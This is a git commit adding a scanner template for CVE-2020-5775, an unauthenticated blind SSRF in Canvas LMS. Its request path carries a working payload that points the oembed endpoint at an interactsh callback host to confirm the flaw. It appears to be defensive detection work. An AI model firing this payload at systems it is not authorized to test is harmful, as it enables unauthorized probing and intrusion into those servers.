Create CVE-2020-5775

patch-1
alph4byt3 2021-11-24 16:57:58 +02:00 committed by GitHub
parent 0d2a2f4e15
commit 5f3b68720d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 22 additions and 0 deletions

22
CVE-2020-5775 Normal file
View File

@ -0,0 +1,22 @@
id: CVE-2020-5775
info:
name: Canvas LMS Unauthenticated Blind SSRF
author: alph4byt3
severity: medium
description: Server-Side Request Forgery in Canvas LMS 2020-07-29 allows a remote, unauthenticated attacker to cause the Canvas application to perform HTTP GET requests to arbitrary domains.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-5775
- https://www.tenable.com/security/research/tra-2020-49
tags: cve,cve2020,ssrf
requests:
- method: GET
path:
- "{{BaseURL}}/external_content/retrieve/oembed?endpoint=http://{{interactsh-url}}&url=foo"
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"